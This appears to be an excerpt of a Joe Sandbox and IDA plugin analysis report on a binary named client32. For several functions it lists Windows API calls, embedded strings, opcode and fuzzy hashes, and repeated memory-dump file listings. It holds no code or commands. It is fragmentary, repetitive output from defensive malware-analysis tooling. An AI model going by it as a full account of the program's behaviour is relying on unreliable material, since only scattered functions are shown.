Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseCreateDescriptorHandleProcessSecurity$AllocCurrentDaclEventFileInitializeLocalModuleName_memset_strrchrwsprintf
String ID: %sNSSilence.exe %u %u$D
API String ID: 1760462761-4146734959
Opcode ID: 0098b9ce497638dfccc624b3fd609ae25a38a440e16af2b016a9f0d3eb9343c3
Instruction ID: 616e847457d338a31cadd4fed46c2e2540dd51436b4ce9db86befcd147ef4e9b
Opcode Fuzzy Hash: 0098b9ce497638dfccc624b3fd609ae25a38a440e16af2b016a9f0d3eb9343c3
Instruction Fuzzy Hash: 1F218575E41329ABEB21DBA4CC89FDDB77C9B04704F108095F719A71C4DAB0AA44CF65

Function 110272B0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?,00000000), ref: 110272CF
OpenProcessToken.ADVAPI32(00000000), ref: 110272D6
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,00000000,?,?,00000000), ref: 110272F8
_malloc.LIBCMT ref: 110272FE

Part of subcall function 1115F231: __FF_MSGBANNER.LIBCMT ref: 1115F24A
Part of subcall function 1115F231: __NMSG_WRITE.LIBCMT ref: 1115F251
Part of subcall function 1115F231: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110C53E,?,?,?,?,111413D2,?,?,?), ref: 1115F276

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?), ref: 11027318
LookupPrivilegeNameA.ADVAPI32(00000000,00000004,?,?), ref: 11027339
_free.LIBCMT ref: 11027364
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,1102F3C1), ref: 11027376

Strings

Luid Low=%x, High=%x, Attr=%x, name=%s, xrefs: 1102734E
@, xrefs: 1102732E

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Token$InformationProcess$AllocateCloseCurrentHandleHeapLookupNameOpenPrivilege_free_malloc
String ID: @$Luid Low=%x, High=%x, Attr=%x, name=%s
API String ID: 2190874299-3275751932
Opcode ID: 2d893da86cb0019d765d438d89b0a63dbbf97d3c189465153b73d7f4741c217c
Instruction ID: d71a20c49b99ff623b4ff6feb6941036d771f231a64fb04089fd6aa2c31912a9
Opcode Fuzzy Hash: 2d893da86cb0019d765d438d89b0a63dbbf97d3c189465153b73d7f4741c217c
Instruction Fuzzy Hash: D62162B5E0021AAFDB10DBE4CC85EAFFBBDEF44704F508119EA15A7240D774A906CBA1

Function 11045294 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 217COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 1104538D
GetTickCount.KERNEL32 ref: 110453D6
GetTickCount.KERNEL32 ref: 110453F6

Strings

IsMember(%ls, %ls) ret %d, took %u ms, xrefs: 11045416
RecIsMember(%ls, %ls) ret %d, took %u ms, xrefs: 11045474

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$FreeString
String ID: IsMember(%ls, %ls) ret %d, took %u ms$RecIsMember(%ls, %ls) ret %d, took %u ms
API String ID: 2011556836-2400621309
Opcode ID: c81b0593cc7a90e3de5be0458108297cf112a9dd11b98b092e1148766ed5b086
Instruction ID: 6db7db9691898adf7471725d6a84bd5aefd236bbccce4e1e027ec318b2147cee
Opcode Fuzzy Hash: c81b0593cc7a90e3de5be0458108297cf112a9dd11b98b092e1148766ed5b086
Instruction Fuzzy Hash: B6815271E0021A9FDB25DF54CC90BAEB3B5EF88315F1085E8E9099BA50EB75AE41CF50

Function 11059040 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 164synchronizationtimeCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000003E8,33E68B52,?,?), ref: 11059089
EnterCriticalSection.KERNEL32(?,?,?), ref: 110590EE
timeGetTime.WINMM(?,?), ref: 1105911C
GetTickCount.KERNEL32 ref: 11059156
LeaveCriticalSection.KERNEL32(?,?,?), ref: 110591CA
EnterCriticalSection.KERNEL32(?,?,?,?,?), ref: 110591E4
LeaveCriticalSection.KERNEL32(?,?,?), ref: 11059209

Strings

_License, xrefs: 11059187
maxslaves, xrefs: 11059182

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$CountObjectSingleTickTimeWaittime
String ID: _License$maxslaves
API String ID: 3724810986-253336860
Opcode ID: 025c4bc23f8c70268b34666c8c88b9f092d6a5f6f9817b999593b6c59c685bf6
Instruction ID: 44817ddc55cf2f921a7c167533af6c0c4e9fa33dbcb75115c21ceb655ef7b95b
Opcode Fuzzy Hash: 025c4bc23f8c70268b34666c8c88b9f092d6a5f6f9817b999593b6c59c685bf6
Instruction Fuzzy Hash: 05518C71E01626DBCB85DFA5C884A6EB7F9FB49704F00866DE925D7644E730E900CBA1

Function 1100B700 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 149COMMON

Download Yara Rule

APIs

GetOverlappedResult.KERNEL32(?,33E68912,FFFFFFFF,00000001), ref: 1100B74C
GetLastError.KERNEL32 ref: 1100B756
GetTickCount.KERNEL32 ref: 1100B7B9
wsprintfA.USER32 ref: 1100B7F6
ResetEvent.KERNEL32(?), ref: 1100B8AF

Strings

Audio, xrefs: 1100B850, 1100B870
New hooked channels,bitspersample=%d,%d (old %d,%d), xrefs: 1100B834, 1100B897
Hook_channels, xrefs: 1100B84B
Hook_bits_per_sample, xrefs: 1100B86B

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountErrorEventLastOverlappedResetResultTickwsprintf
String ID: Audio$Hook_bits_per_sample$Hook_channels$New hooked channels,bitspersample=%d,%d (old %d,%d)
API String ID: 3598861413-432254317
Opcode ID: 868469a9d7cc74a065b9a95335b5d4c4467cfed89233263db95ad8633e6aad6c
Instruction ID: 0885abcf1189660c02bbac00ae85af07fda2de7bc0a41e868fc495fde2869d18
Opcode Fuzzy Hash: 868469a9d7cc74a065b9a95335b5d4c4467cfed89233263db95ad8633e6aad6c
Instruction Fuzzy Hash: B951F3B8D00A16ABE710CF64CC84ABBB7F8FF84358F04451DF56992281E7747980C7A5

Function 110DB0B0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 122COMMON

Download Yara Rule

APIs

OutputDebugStringA.KERNEL32(NsAppSystem Info : Unexpected data from NsStudentApp...), ref: 110DB15D
std::exception::exception.LIBCMT ref: 110DB198
__CxxThrowException@8.LIBCMT ref: 110DB1B3
OutputDebugStringA.KERNEL32(NsAppSystem Info : Control Channel Closed by 0 bytes RECV...), ref: 110DB221
OutputDebugStringA.KERNEL32(NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********), ref: 110DB255

Part of subcall function 110D5630: __CxxThrowException@8.LIBCMT ref: 110D569A
Part of subcall function 110D5630: #16.WSOCK32(?,?,?,00000000,00001000,33E68B52,?,00000000,00000001), ref: 110D56BC

Part of subcall function 1110C4B0: _malloc.LIBCMT ref: 1110C4C9
Part of subcall function 1110C4B0: wsprintfA.USER32 ref: 1110C4E4
Part of subcall function 1110C4B0: _memset.LIBCMT ref: 1110C507

Strings

NsAppSystem Info : Control Channel Waiting For Data..., xrefs: 110DB0E3
NsAppSystem Info : Control Channel Closed by 0 bytes RECV..., xrefs: 110DB21C
NsAppSystem Info : Unexpected data from NsStudentApp..., xrefs: 110DB155
NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********, xrefs: 110DB250

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DebugOutputString$Exception@8Throw$_malloc_memsetstd::exception::exceptionwsprintf
String ID: NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********$NsAppSystem Info : Control Channel Closed by 0 bytes RECV...$NsAppSystem Info : Control Channel Waiting For Data...$NsAppSystem Info : Unexpected data from NsStudentApp...
API String ID: 477284662-4139260718
Opcode ID: 8bc9d6162aa5a9149ad0d3c734fb6128370cebb3ef792449b8f3a7e86bc76c06
Instruction ID: fa6e30d2d6cecba1b8951b501454647513c648ddac625e249921072e7537f7ac
Opcode Fuzzy Hash: 8bc9d6162aa5a9149ad0d3c734fb6128370cebb3ef792449b8f3a7e86bc76c06
Instruction Fuzzy Hash: DB414B79E00359DFCB05CFA8C880AAEFBB4FF49708F508159E415AB241DB35A904CBA1

Function 11125160 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 156COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 11125180

Part of subcall function 1115CAC3: std::exception::exception.LIBCMT ref: 1115CAD8
Part of subcall function 1115CAC3: __CxxThrowException@8.LIBCMT ref: 1115CAED
Part of subcall function 1115CAC3: std::exception::exception.LIBCMT ref: 1115CAFE

_memmove.LIBCMT ref: 1112520A
_memmove.LIBCMT ref: 1112522E
_memmove.LIBCMT ref: 11125268
_memmove.LIBCMT ref: 11125284
std::exception::exception.LIBCMT ref: 111252CE
__CxxThrowException@8.LIBCMT ref: 111252E3

Strings

deque<T> too long, xrefs: 1112517B

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
String ID: deque<T> too long
API String ID: 827257264-309773918
Opcode ID: 7771e06bc5c1eb4bd3affd7f4a575843720732d683f9b8efc967851fcca73803
Instruction ID: 09db0a3ef1a8b97eb13c6bf20f886ffc4e465cfcc5913386cf6d47a97a487126
Opcode Fuzzy Hash: 7771e06bc5c1eb4bd3affd7f4a575843720732d683f9b8efc967851fcca73803
Instruction Fuzzy Hash: C541A476E00115EBDB44CE68CC81AEEF7B6EF81214F69C669E819D7344F674EE018790

Function 1114D260 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 155COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 1114D2A7
VariantCopy.OLEAUT32(?,?), ref: 1114D2B2
InterlockedDecrement.KERNEL32(00000000), ref: 1114D3A3
SysFreeString.OLEAUT32(00000000), ref: 1114D3B4
VariantClear.OLEAUT32(?), ref: 1114D3D7

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Strings

IsA(), xrefs: 1114D2F6, 1114D37A
j WBL::Navigate("%s"): Not found, xrefs: 1114D38B
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1114D2F1, 1114D375

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Variant$ClearCopyDecrementErrorExitFreeInitInterlockedLastMessageProcessStringwsprintf
String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$j WBL::Navigate("%s"): Not found
API String ID: 2113348986-1444239324
Opcode ID: 505b6a715768720a2132686fdee3dcbce9efb1037a56723b4091fba8596d906a
Instruction ID: ef2dcad5329b224375f8636342de6fbdbedf0c757d6702f57242542df085ab20
Opcode Fuzzy Hash: 505b6a715768720a2132686fdee3dcbce9efb1037a56723b4091fba8596d906a
Instruction Fuzzy Hash: BE51C5B5A00606AFDF00DFA5CD84E9FF7B9AF59714F608258E915A7340DB34E901CBA1

Function 1104B05F Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 126windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1105D350: __wcstoi64.LIBCMT ref: 1105D38D

PostMessageA.USER32(0000FFFF,0000C1DA,00000000,00000000), ref: 1104B155
PostMessageA.USER32(000203F4,0000048F,00000032,00000000), ref: 1104B186
PostMessageA.USER32(000203F4,00000483,00000000,00000000), ref: 1104B198
PostMessageA.USER32(000203F4,0000048F,000000C8,00000000), ref: 1104B1AC
PostMessageA.USER32(000203F4,00000483,00000001,?), ref: 1104B1C3
PostMessageA.USER32(000203F4,00000800,00000000,00000000), ref: 1104B1D4

Strings

Client, xrefs: 1104B06C
UnloadMirrorOnEndView, xrefs: 1104B067

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessagePost$__wcstoi64
String ID: Client$UnloadMirrorOnEndView
API String ID: 1802880851-3586292995
Opcode ID: 625ed2a9e27e85a60aba76972fa3aca57e7d560bc84cde9a3d0dcc344165281d
Instruction ID: e0505e309cb56cc8f5ff04908351ccd34322ec2c7b7688592d6fea5d03e3379f
Opcode Fuzzy Hash: 625ed2a9e27e85a60aba76972fa3aca57e7d560bc84cde9a3d0dcc344165281d
Instruction Fuzzy Hash: 4041F575B02621AFD715DBA0CC81FAEF7A9BF85B08F108169FA1567284CB70B940CBD5

Function 1103B480 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 1110B680: timeGetTime.WINMM(?,1103B572,?,?,?,?,1104813B,00000001,?,00000015,00000000), ref: 1110B68D

Part of subcall function 110F6180: _memset.LIBCMT ref: 110F61A5
Part of subcall function 110F6180: GetACP.KERNEL32(023CB808,DBCS,Charset,932=*128,?,?,?), ref: 110F620E

Sleep.KERNEL32(00000032,?,?,?,?,?,1104813B,00000001,?,00000015,00000000), ref: 1103B592
GetDC.USER32(00000000), ref: 1103B59A
GetPixel.GDI32(00000000,00000000,00000000), ref: 1103B5A7
SetPixel.GDI32(00000000,00000000,00000000,00000000), ref: 1103B5B3
ReleaseDC.USER32(00000000,00000000), ref: 1103B5BC

Strings

View, xrefs: 1103B507
limitcolorbits, xrefs: 1103B502
DoFlushOptimal, maxcb=%d, cb=%d, gcb=%d, xrefs: 1103B4D9

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Pixel$ReleaseSleepTime_memsettime
String ID: DoFlushOptimal, maxcb=%d, cb=%d, gcb=%d$View$limitcolorbits
API String ID: 686385934-1413253680
Opcode ID: 037291e0453de2b56176ec45a180a0ac1fd2cb6dc67d454a1bec5f8aa08c0fc6
Instruction ID: 1474a270528c4e521f872793c3a640e034a74c198d616fd46ed722c0cfd50d50
Opcode Fuzzy Hash: 037291e0453de2b56176ec45a180a0ac1fd2cb6dc67d454a1bec5f8aa08c0fc6
Instruction Fuzzy Hash: 39418A35E1161A9FEF15CFA4CD91BFFB7A4EB84309F10416DE916AB280DB34A900C7A5

